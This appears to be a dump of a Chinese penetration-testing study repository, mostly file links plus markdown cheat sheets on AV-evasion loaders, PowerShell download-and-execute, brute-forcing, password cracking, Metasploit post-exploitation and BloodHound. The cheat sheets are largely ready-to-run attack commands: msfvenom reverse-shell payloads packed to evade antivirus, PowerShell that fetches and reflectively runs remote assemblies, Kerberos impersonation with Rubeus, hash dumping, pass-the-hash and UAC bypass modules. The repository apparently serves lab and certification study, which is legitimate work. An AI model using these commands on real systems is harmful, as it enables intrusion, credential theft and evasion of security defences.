https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/c3565cf93de4990f41f41b25aed80571.png


--------------------------------------------------------------------------------
/img/c9113ad0ff443dd0973736552e85aa69.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/c9113ad0ff443dd0973736552e85aa69.png


--------------------------------------------------------------------------------
/img/c99038cd6cc9e37512edabb1f873a4da.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/c99038cd6cc9e37512edabb1f873a4da.png


--------------------------------------------------------------------------------
/img/d2f78ae2b44ef76453a80144dac86b4e.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/d2f78ae2b44ef76453a80144dac86b4e.png


--------------------------------------------------------------------------------
/img/dc5fa3e75ff056f11e16c03373799f45.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/dc5fa3e75ff056f11e16c03373799f45.png


--------------------------------------------------------------------------------
/img/f7ed25a701cf20ea85cf333b20708ffe.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/f7ed25a701cf20ea85cf333b20708ffe.png


--------------------------------------------------------------------------------
/img/fe703ddea6135e0c867afcc6f61a8cd2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/fe703ddea6135e0c867afcc6f61a8cd2.png


--------------------------------------------------------------------------------
/img/fuzz.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/fuzz.png


--------------------------------------------------------------------------------
/img/shellcode地址.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/shellcode地址.png


--------------------------------------------------------------------------------
/img/查找坏字节1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/查找坏字节1.png


--------------------------------------------------------------------------------
/img/查找坏字节2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/查找坏字节2.png


--------------------------------------------------------------------------------
/img/查找坏字节3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/查找坏字节3.png


--------------------------------------------------------------------------------
/命令备忘/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/命令备忘/.DS_Store


--------------------------------------------------------------------------------
/命令备忘/bypass相关/Freeze.md:
--------------------------------------------------------------------------------
 1 | # 工具地址
 2 | 
 3 | ```
 4 | https://github.com/optiv/Freeze
 5 | ```
 6 | 
 7 | 
 8 | # 注意
 9 | 
10 | 1. go版本最好是1.19.x，不然会有坑
11 | 
12 | ```
13 | ┌──(root㉿kali)-[~/osep/Freeze]
14 | └─# go version                       
15 | go version go1.19.8 linux/amd64
16 | 
17 | ```
18 | 
19 | 2. 手动下载几个包
20 | 
21 | 指定go源
22 | ```
23 | # 1. 七牛 CDN
24 | go env -w  GOPROXY=https://goproxy.cn,direct
25 | 
26 | # 2. 阿里云
27 | go env -w GOPROXY=https://mirrors.aliyun.com/goproxy/,direct
28 | 
29 | # 3. 官方
30 | go env -w  GOPROXY=https://goproxy.io,direct
31 | 
32 | ```
33 | 
34 | 缺啥补啥，国内源可能有坑
35 | ```
36 | go build golang.org/x/sys/windows
37 | ```
38 | 
39 | 3. 生成payload
40 | 
41 | payload
42 | ```
43 | msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.5 LPORT=443 -f raw -o rev64.bin
44 | ```
45 | 
46 | 加密
47 | ```
48 | ./Freeze -I /root/osep/rev64.bin -O rev64.exe -encrypt 
49 | ```
50 | 
51 | 同文件夹生成一个rev64.exe
52 | ```
53 | ┌──(root㉿kali)-[/opt/Freeze]
54 | └─# ls
55 | Freeze  Freeze.go  go.mod  go.sum  LICENSE  Loader  README.md  rev64.exe  Screenshots  Struct  Utils
56 | 
57 | ```


--------------------------------------------------------------------------------
/命令备忘/bypass相关/SysWhispers3WinHttp.md:
--------------------------------------------------------------------------------
 1 | # 工具地址
 2 | 
 3 | ```
 4 | https://github.com/huaigu4ng/SysWhispers3WinHttp
 5 | ```
 6 | 
 7 | 生成payload，但是貌似只支持32位
 8 | ```
 9 | // 1. 使用msfvenom生成shellcode（或使用CobaltStrike生成Stageless之Shellcode）
10 | msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.1.104 lport=4444 -f raw -o beacon.bin
11 | 
12 | // 2. 使用python3开启Web服务（或使用CobaltStrike之HostFile功能）
13 | python3 -m http.server
14 | 
15 | // 3. 修改SysWhispers3WinHttp.c第40行IP地址并使用Linux32位GCC进行交叉编译
16 | i686-w64-mingw32-gcc -o SysWhispers3WinHttp.exe syscalls.c SysWhispers3WinHttp.c -masm=intel -fpermissive -w -s -lwinhttp
17 | ```


--------------------------------------------------------------------------------
/命令备忘/powershell.md:
--------------------------------------------------------------------------------
 1 | # 反射加载```C#```程序
 2 | 
 3 | ## 下载执行（不带参数）
 4 | ```
 5 | $data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/rev.exe')
 6 | $assem = [System.Reflection.Assembly]::Load($data)
 7 | [rev.Program]::Main()
 8 | ```
 9 | 
10 | ## 下载执行（带参数）
11 | ```
12 | $data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/Rubeus.exe')
13 | $assem = [System.Reflection.Assembly]::Load($data)
14 | [Rubeus.Program]::Main("s4u /user:web01$ /rc4:1d77f43d9604e79e5626c6905705801e /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split())
15 | ```
16 | 
17 | ## 从程序集（动态链接库dll）执行指定某个方法
18 | ```
19 | $data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/lib.dll')
20 | $assem = [System.Reflection.Assembly]::Load($data)
21 | $class = $assem.GetType("ClassLibrary1.Class1")
22 | $method = $class.GetMethod("runner")
23 | $method.Invoke(0, $null)
24 | ```
25 | 
26 | 
27 | # 加密命令
28 | 
29 | ## windows
30 | ```
31 | $command = 'IEX (New-Object Net.WebClient).DownloadString("http://172.16.100.55/Invoke-PowerShellTcpRun.ps1")'
32 | $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
33 | $encodedCommand = [Convert]::ToBase64String($bytes)
34 | ```
35 | 
36 | ## linux
37 | ```
38 | echo 'IEX (New-Object Net.WebClient).DownloadString("http://172.16.100.55/Invoke-PowerShellTcpRun.ps1")' | iconv -t utf-16le | base64 -w 0
39 | ```
40 | 
41 | ## 把ps1文件转成加密命令
42 | 
43 | 这步执行以后会复制命令到粘贴板
44 | ```
45 | [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\path\to\PowerView.ps1')) | clip
46 | ```
47 | 
48 | 执行
49 | ```
50 | Powershell -EncodedCommand $encodedCommand
51 | ```
52 | 
53 | 


--------------------------------------------------------------------------------
/命令备忘/web爆破.md:
--------------------------------------------------------------------------------
 1 | # web 目录爆破
 2 | 
 3 | ## dirsearch
 4 | 
 5 | ```
 6 | python3 /root/dirsearch/dirsearch.py -e* -u 10.10.10.233 -t 100
 7 | ```
 8 | 
 9 | ## gobuster
10 | 
11 | ```
12 | gobuster dir -w /usr/share/wordlists/Web-Content/common.txt -u http://10.10.10.191 -t 30 --no-error
13 | ```
14 | 
15 | 
16 | ## ffuf
17 | 
18 | ```
19 | ffuf -w /path/to/wordlist -u https://target/FUZZ
20 | 
21 | //只看200,301
22 | ffuf -w  /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -u http://trickster.htb/FUZZ -mc 200,301   
23 | 
24 | ```
25 | 
26 | 
27 | # 爆破带指定扩展名
28 | ```
29 | gobuster dir -t 100  --no-error --url http://10.13.38.11 -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -x asp,aspx,txt
30 | ```
31 | 
32 | 
33 | 
34 | # vhost爆破
35 | ```
36 | gobuster vhost -u horizontall.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100
37 | 
38 | gobuster vhost -u http://devvortex.htb -w /usr/share/wordlists/SecLists-2023.2/Discovery/DNS/subdomains-top1million-110000.txt --append-domain --no-error
39 | 
40 | #只显示状态码是200的结果
41 | ffuf -w /usr/share/wordlists/SecLists-2023.2/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.permx.htb" -u http://permx.htb -mc 200
42 | 
43 | ```
44 | 
45 | 如果开启了DNS服务，并且存在域传送漏洞
46 | ```
47 | dig axfr cronos.htb @10.10.10.13
48 | ```
49 | 
50 | 
51 | # fuzzing特定url
52 | ```
53 | ffuf -w co_fuzz.txt -u http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt
54 | ```
55 | 
56 | 
57 | # 爆破登录表单
58 | 
59 | http
60 | ```
61 | hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^&login=Login:Incorrect username or password."
62 | ```
63 | 
64 | https
65 | ```
66 | hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password"
67 | ```
68 | 
69 | 
70 | # 根据页面生成用户名/密码名单
71 | 
72 | ```
73 | cewl --with-numbers -w passwd.txt http://fuse.fabricorp.local/papercut/logs/html/index.htm
74 | 
75 | cewl -d 1 -m 3 -w user.txt 10.10.10.175
76 | ```
77 | 
78 | # LFI爆破
79 | 
80 | ```
81 | wfuzz -c -w /usr/share/wordlists/SecLists-2023.2/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt --hw 0 http://mailing.htb/download.php?file=../../../../../../../FUZZ 
82 | ```


--------------------------------------------------------------------------------
/命令备忘/内网扫描.md:
--------------------------------------------------------------------------------
 1 | # 工具
 2 | 
 3 | [fscan](https://github.com/shadow1ng/fscan)
 4 | 
 5 | [Ladon](https://github.com/k8gege/Ladon)
 6 | 
 7 | 
 8 | # 端口扫描，
 9 | ```
10 | fscan64.exe -h 192.168.0.24 -p 1-65535
11 | ```
12 | 
13 | ```
14 | Ladon911.exe 192.168.0.24/24 PortScan
15 | 
16 | Ladon911.exe 192.168.0.29 portscan 1-65535
17 | ```
18 | 
19 | # 内网主机存活扫描
20 | 
21 | ```
22 | fscan64.exe -h 192.168.1.1/24 
23 | ```
24 | 
25 | ```
26 | Ladon911.exe 192.168.0.1-192.168.0.255 ICMP    #icmp
27 | 
28 | Ladon 192.168.1.8/24 OnlinePC    #多协议
29 | 
30 | 
31 | Ladon 192.168.1.8/24 OnlineIP
32 | ```
33 | 
34 | # 同网段主机扫描
35 | ```
36 | for /l %i in (1,1,255) do @ping 172.16.1.%i -w 1 -n 1|find /i "ttl"
37 | ```


--------------------------------------------------------------------------------
/命令备忘/密码攻击.md:
--------------------------------------------------------------------------------
 1 | # NTLM
 2 | ```
 3 | hashcat -a 0 -m 1000 hash.txt dict/rockyou.txt
 4 | ```
 5 | 
 6 | # Net-NTLMv2
 7 | ```
 8 | john --wordlist=dict/rockyou.txt hash.txt
 9 | 
10 | hashcat -m 5600 hash.txt dict/rockyou.txt --force
11 | ```
12 | 
13 | 
14 | # Kerberoasting
15 | ```
16 | john --format=krb5tgs --wordlist=dict/rockyou.txt hash.txt
17 | ```
18 | 
19 | 
20 | # ASREPRoasting
21 | ```
22 | hashcat -a 0 -m 18200 hash.txt dict/rockyou.txt
23 | 
24 | john --format=krb5asrep --wordlist=dict/rockyou.txt hash.txt
25 | ```
26 | 
27 | # 检索哈希 
28 | 
29 | ```
30 | hashid c43ee559d69bc7f691fe2fbfe8a5ef0a
31 | 
32 | 
33 | hashid '$6$l5bL6XIASslBwwUD$bCxeTlbhTH76wE.bI66aMYSeDXKQ8s7JNFwa1s1KkTand6ZsqQKAF3G0tHD9bd59e5NAz/s7DQcAojRTWNpZX0'
34 | ```
35 | 
36 | # john
37 | 
38 | zip
39 | ```
40 | zip2john file1.zip>hash.txt
41 | john --wordlist=rockyou.txt hash.txt
42 | ```
43 | 
44 | rar
45 | ```
46 | rar2john file1.rar > hash.txt
47 | john --wordlist=rockyou.txt hash.txt
48 | ```
49 | 
50 | gpg
51 | ```
52 | gpg2john file1.priv > hash.txt
53 | john --wordlist=rockyou.txt hash.txt
54 | ```
55 | 
56 | shadow
57 | ```
58 | unshadow passwd shadow
59 | john --wordlist=rockyou.txt --format=sha512crypt unshadowed.txt
60 | ```
61 | 
62 | ssh
63 | ```
64 | ssh2john id_rsa > hash.txt
65 | john --wordlist=rockyou.txt hash.txt
66 | ```
67 | 
68 | NTML
69 | ```
70 | john --wordlist=rockyou.txt hash.txt --format=NT
71 | ```
72 | 
73 | PDF
74 | ```
75 | pdf2john file.pdf > hash.txt
76 | john hash.txt --wordlist=dict/rockyou.txt
77 | ```
78 | 
79 | keepass
80 | ```
81 | keepass2john Database.kdb >keep.hash
82 | john --wordlist=rockyou.txt keep.hash 
83 | ```
84 | 
85 | office
86 | ```
87 | office2john logins.xlsx >hash.txt
88 | ```


--------------------------------------------------------------------------------
/命令备忘/工具/MSF.md:
--------------------------------------------------------------------------------
  1 | # meterpreter
  2 | 
  3 | 列出所有凭据
  4 | ```
  5 | creds_all
  6 | ```
  7 | ## 系统命令
  8 | 
  9 | 1. execute执行文件
 10 | 
 11 | ```
 12 | execute #在目标机中执行文件
 13 | execute -H -i -f cmd.exe # 创建新进程cmd.exe，-H不可见，-i交互
 14 | ```
 15 | 
 16 | 2. migrate进程迁移
 17 | 
 18 | ```
 19 | getpid    # 获取当前进程的pid
 20 | ps   # 查看当前活跃进程
 21 | migrate <pid值>    #将Meterpreter会话移植到指定pid值进程中
 22 | kill <pid值>   #杀死进程
 23 | ```
 24 | 
 25 | 
 26 | ## 文件系统命令
 27 | 
 28 | 1. 基本文件系统命令
 29 | 
 30 | ```
 31 | getwd 或者pwd # 查看当前工作目录  
 32 | ls
 33 | cd
 34 | search -f *pass*       # 搜索文件  -h查看帮助
 35 | cat c:\\lltest\\lltestpasswd.txt  # 查看文件内容
 36 | upload /tmp/hack.txt C:\\lltest  # 上传文件到目标机上
 37 | download c:\\lltest\\lltestpasswd.txt /tmp/ # 下载文件到本机上
 38 | edit c:\\1.txt #编辑或创建文件  没有的话，会新建文件
 39 | rm C:\\lltest\\hack.txt
 40 | mkdir lltest2  #只能在当前目录下创建文件夹
 41 | rmdir lltest2  #只能删除当前目录下文件夹
 42 | getlwd   或者 lpwd   #操作攻击者主机 查看当前目录
 43 | lcd /tmp   #操作攻击者主机 切换目录
 44 | ```
 45 | 
 46 | ## 信息收集
 47 | 
 48 | ```
 49 | /usr/share/metasploit-framework/modules/post/windows/gather
 50 | /usr/share/metasploit-framework/modules/post/linux/gather
 51 | ```
 52 | 
 53 | 
 54 | ```
 55 | run post/windows/gather/checkvm #是否虚拟机
 56 | run post/linux/gather/checkvm #是否虚拟机
 57 | run post/windows/gather/forensics/enum_drives #查看分区
 58 | run post/windows/gather/enum_applications #获取安装软件信息
 59 | run post/windows/gather/dumplinks   #获取最近的文件操作
 60 | run post/windows/gather/enum_ie  #获取IE缓存
 61 | run post/windows/gather/enum_chrome   #获取Chrome缓存
 62 | run post/windows/gather/enum_patches  #补丁信息
 63 | run post/windows/gather/enum_domain  #查找域控
 64 | ```
 65 | 
 66 | 
 67 | ## 提权
 68 | 
 69 | 1. getsystem提权
 70 | ```
 71 | getsystem
 72 | ```
 73 | 
 74 | 
 75 | 2. bypassuac
 76 | 
 77 | ```
 78 | use exploit/windows/local/bypassuac
 79 | use exploit/windows/local/bypassuac_injection
 80 | use windows/local/bypassuac_vbs
 81 | use windows/local/ask
 82 | ```
 83 | 
 84 | 3. 内核漏洞提权
 85 | 可先利用enum_patches模块 收集补丁信息，然后查找可用的exploits进行提权
 86 | ```
 87 | meterpreter > run post/windows/gather/enum_patches  #查看补丁信息
 88 | msf > use exploit/windows/local/ms13_053_schlamperei
 89 | msf > set SESSION 2
 90 | msf > exploit
 91 | ```
 92 | 
 93 | 
 94 | 4. 自动枚举
 95 | 
 96 | ```
 97 | multi/recon/local_exploit_suggester
 98 | ```
 99 | 
100 | 
101 | ## 令牌操纵
102 | 1.  incognito模块
103 | 
104 | ```
105 | use incognito      #help incognito  查看帮助
106 | list_tokens -u    #查看可用的token
107 | impersonate_token 'NT AUTHORITY\SYSTEM'  #假冒SYSTEM token
108 | 
109 | # 或者impersonate_token NT\ AUTHORITY\\SYSTEM #不加单引号 需使用\\
110 | execute -f cmd.exe -i –t    # -t 使用假冒的token 执行
111 | 
112 | #或者直接shell
113 | rev2self   #返回原始token
114 | ```
115 | 
116 | 2. steal_token窃取令牌
117 | 
118 | ```
119 | steal_token <pid值>   #从指定进程中窃取token   先ps
120 | drop_token  #删除窃取的token
121 | ```
122 | 
123 | ## 哈希利用
124 | 
125 | 1. 获取哈希
126 | 
127 | ```
128 | run post/windows/gather/smart_hashdump  #从SAM导出密码哈希
129 | #需要SYSTEM权限
130 | ```
131 | 
132 | 2. PSExec哈希传递
133 | 
134 | ```
135 | msf > use exploit/windows/smb/psexec
136 | msf > set payload windows/meterpreter/reverse_tcp
137 | msf > set LHOST 192.168.159.134
138 | msf > set LPORT 443
139 | msf > set RHOST 192.168.159.144
140 | msf >set SMBUser Administrator
141 | msf >set SMBPass aad3b4*****04ee:5b5f00*****c424c
142 | msf >set SMBDomain  WORKGROUP   #域用户需要设置SMBDomain
143 | msf >exploit
144 | ```
145 | 


--------------------------------------------------------------------------------
/命令备忘/工具/bloodhound.md:
--------------------------------------------------------------------------------
  1 | # Linux
  2 | 
  3 | ## 开启neo4j
  4 | ```
  5 | neo4j console
  6 | ```
  7 | 
  8 | ## 开启bloodhound
  9 | ```
 10 | bloodhound --no-sandbox
 11 | ```
 12 | 
 13 | # windows
 14 | ## 初始化
 15 | ```
 16 | .\neo4j.bat install-service
 17 | ```
 18 | 
 19 | ## 开启neo4j
 20 | ```
 21 | .\neo4j.bat start
 22 | ```
 23 | 
 24 | ## 开启bloodhound
 25 | 
 26 | 双击BloodHound.exe
 27 | 
 28 | 
 29 | 
 30 | 
 31 | # 执行
 32 | ```
 33 | Invoke-BloodHound -CollectionMethod All -verbose
 34 | 
 35 | SharpHound.exe -c All --domain dev.ADMIN.OFFSHORE.COM
 36 | ```
 37 | 
 38 | 
 39 | # ACE
 40 | 
 41 | **ForceChangePassword**：我们可以在不知道用户当前密码的情况下设置用户当前密码。
 42 | **AddMembers**：我们有能力将用户（包括我们自己的帐户）、组或计算机添加到目标组。
 43 | **GenericAll**：我们可以完全控制对象，包括更改用户密码、注册 SPN 或将 AD 对象添加到目标组的能力。
 44 | **GenericWrite**：我们可以更新目标对象的任何非保护参数。例如，这可以让我们更新 scriptPath 参数，这将导致脚本在用户下次登录时执行。
 45 | **WriteOwner**：我们有能力更新目标对象的所有者。我们可以让自己成为所有者，从而获得对该对象的额外权限。
 46 | **WriteDACL**：我们有能力将新的 ACE 写入目标对象的DACL。例如，我们可以编写一个 ACE，授予我们的帐户对目标对象的完全控制权。
 47 | **AllExtendedRights**：我们能够针对目标对象执行与扩展 AD 权限相关的任何操作。例如，这包括强制更改用户密码的能力。
 48 | 
 49 | 
 50 | 
 51 | # 所有session
 52 | 
 53 | ```
 54 | MATCH p=(m:Computer)-[r:HasSession]->(n:User) RETURN p
 55 | ```
 56 | 
 57 | # 查找所有域计算机上的活动用户会话
 58 | 
 59 | ```
 60 | MATCH p1=shortestPath(((u1:User)-[r1:MemberOf*1..]->(g1:Group))) MATCH p2=(c:Computer)-[*1]->(u1) RETURN p2
 61 | ```
 62 | 
 63 | # 所有用户
 64 | 
 65 | ```
 66 | MATCH (u:User) return u
 67 | ```
 68 | 
 69 | # 所有计算机
 70 | 
 71 | ```
 72 | MATCH (c:Computer) return c
 73 | ```
 74 | 
 75 | # 所有GPO
 76 | 
 77 | ```
 78 | Match (n:GPO) return n
 79 | ```
 80 | 
 81 | # 所有spn的用户
 82 | 
 83 | ```
 84 | MATCH (n: User) WHERE n.hasspn = true RETURN n
 85 | ```
 86 | 
 87 | # 无约束委托机器
 88 | 
 89 | ```
 90 | MATCH (c:Computer {unconstraineddelegation:true}) return c
 91 | ```
 92 | 
 93 | # 查找包含admin的所有组
 94 | 
 95 | ```
 96 | Match (n:Group) WHERE n.name CONTAINS "ADMIN" return n
 97 | ```
 98 | 
 99 | # 查找关闭kerberos预认证的用户
100 | 
101 | ```
102 | MATCH (u:User {dontreqpreauth: true}) RETURN u
103 | ```
104 | 
105 | # Find interesting ACL
106 | 
107 | ```
108 | MATCH (n:User {admincount:False}) MATCH (m:User) WHERE NOT m.name = n.name MATCH p=allShortestPaths((n)-[r:AllExtendedRights|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner*1..]->(m)) RETURN p
109 | ```


--------------------------------------------------------------------------------
/提权/linux提权.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/提权/linux提权.xmind


--------------------------------------------------------------------------------
/提权/提权工具/peass/win/winPEASx64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/提权/提权工具/peass/win/winPEASx64.exe


--------------------------------------------------------------------------------
/提权/提权工具/peass/win/winPEASx86.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/提权/提权工具/peass/win/winPEASx86.exe


--------------------------------------------------------------------------------
/杂七杂八/img/1681831089636.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/img/1681831089636.jpg


--------------------------------------------------------------------------------
/杂七杂八/img/1681831897783.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/img/1681831897783.jpg


--------------------------------------------------------------------------------
/杂七杂八/img/1681832433238.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/img/1681832433238.png


--------------------------------------------------------------------------------
/杂七杂八/img/1681832588697.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/img/1681832588697.png


--------------------------------------------------------------------------------
/杂七杂八/img/1681832687815.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/img/1681832687815.png


--------------------------------------------------------------------------------
/杂七杂八/img/1681832754502.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/img/1681832754502.png


--------------------------------------------------------------------------------
/杂七杂八/img/1681832856739.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/img/1681832856739.png


--------------------------------------------------------------------------------
/杂七杂八/img/1681833225045.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/img/1681833225045.png


--------------------------------------------------------------------------------
/杂七杂八/naabu:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/naabu


--------------------------------------------------------------------------------
/杂七杂八/nmap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/nmap


--------------------------------------------------------------------------------
/杂七杂八/nmap64:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/nmap64


--------------------------------------------------------------------------------
/杂七杂八/xmind/Burpsite.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/xmind/Burpsite.xmind


--------------------------------------------------------------------------------
/杂七杂八/xmind/MySql注入攻防技术.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/xmind/MySql注入攻防技术.xmind


--------------------------------------------------------------------------------
/杂七杂八/xmind/Pentesting_Active_directory.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/xmind/Pentesting_Active_directory.xmind


--------------------------------------------------------------------------------
/杂七杂八/xmind/kali Linux.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/xmind/kali Linux.xmind


--------------------------------------------------------------------------------
/杂七杂八/xmind/msf.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/xmind/msf.xmind


--------------------------------------------------------------------------------
/杂七杂八/xmind/web网络安全攻防.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/xmind/web网络安全攻防.xmind


--------------------------------------------------------------------------------
/杂七杂八/xmind/域渗透中文翻译版.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/xmind/域渗透中文翻译版.xmind


--------------------------------------------------------------------------------
/杂七杂八/xmind/提权.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/xmind/提权.xmind


--------------------------------------------------------------------------------
/杂七杂八/xmind/网络安全训练营.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/xmind/网络安全训练营.xmind


--------------------------------------------------------------------------------
/杂七杂八/xmind/计算机网络.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/xmind/计算机网络.xmind


--------------------------------------------------------------------------------
/杂七杂八/内网渗透/后渗透阶段.md:
--------------------------------------------------------------------------------
  1 | # 概要
  2 | 
  3 | 1. 权限提升：权限提升的集中方式
  4 | 2. 信息收集：服务器信息、Hash、防火墙杀毒软件、账号密码
  5 | 3. 内网渗透：端口转发、代理跳板
  6 | 4. 后门植入：永久后门维持权限
  7 | 
  8 | # 权限提升
  9 | 
 10 | 1. 提高程序运行级别
 11 | - Exploit/windows/local/ask
 12 | 
 13 | 上面模块执行攻击以后，在靶机会弹出一个UAC对话框，当且仅当靶机管理员点击是（授权执行）以后才能收到提权的反弹shell，也就是说需要和管理员交互。
 14 | 
 15 | 2. UAC绕过
 16 | - Exploit/windows/local/bypassuac
 17 | - Exploit/windows/local/bypassuac_injection
 18 | - Exploit/windows/local/bypassuac_vbs
 19 | 
 20 | 上面模块不需要与靶机管理员交互，直接绕过UAC（执行成功以后需要再执行getsystem命令）
 21 | 
 22 | 3. 利用本地提权漏洞进行提权
 23 | 
 24 | 根据具体的系统环境，查找对应的本地系统提升漏洞
 25 | 
 26 | # 信息收集
 27 | 
 28 | 信息收集相关
 29 | - 获取目标机器的分区情况：post/windows/gather/forensics/enum_drives
 30 | - 判断是否为虚拟机：post/windows/gather/checkvm
 31 | - 开启哪些服务：post/windows/gather/enum_services
 32 | - 安装了哪些应用：post/windows/gather/enum_applocations
 33 | - 查看共享：post/windows/gather/enum_shares
 34 | - 获取主机最近的系统操作：post/windows/gather/dumplinks
 35 | - 查看补丁：post/windows/gather.enum_applications
 36 | - scraper脚本
 37 | - winenum脚本
 38 | 
 39 |  
 40 | # 数据包捕获
 41 | 
 42 | 抓包与解包
 43 | > 抓包
 44 | 
 45 | - 加载sniffer:load sniffer
 46 | - 查看网卡信息：sniffer_interface
 47 | - 开启监听：sniffer_start 1
 48 | - 导出数据包:sniffer_dump 1 1.cap
 49 | 
 50 | > 解包
 51 | 
 52 | - auxiliary/sniffer/psnuffle
 53 | 
 54 | # PassingTheHash
 55 | Hash 基础知识
 56 | windows系统下的hash密码格式为：
 57 | 
 58 | > 用户名称：RID：LM-HASH值：NT-HASH值
 59 | 
 60 | 
 61 | 获取Hash值
